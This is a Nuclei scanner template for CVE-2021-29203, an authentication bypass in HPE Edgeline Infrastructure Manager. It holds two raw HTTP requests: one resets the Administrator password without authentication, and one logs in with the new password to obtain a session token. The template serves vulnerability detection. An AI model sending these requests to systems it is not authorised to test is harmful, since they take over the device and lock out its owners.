id: CVE-2021-29203

info:
  name: HPE Edgeline Infrastructure Manager v1.21 Authentication Bypass
  author: madrobot
  severity: critical
  tags: hpe,cve,cve2021,bypass
  reference: |
    - https://www.tenable.com/security/research/tra-2021-15
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29203

requests:
  - raw:
      - |
        PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Accept: */*
        Content-Length: 23
        Content-Type: application/json
        Connection: close

        {"Password":"{{randstr}}"}

      - |
        POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Content-Length: 50
        Content-Type: application/json
        Connection: close

        {"UserName":"Administrator","Password":"{{randstr}}"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 201

      - type: word
        condition: and
        part: header
        words:
          - "X-Auth-Token"
          - "PasswordReset"
          - "Location"

      - type: word
        part: body
        words:
          - "Base.1.0.Created"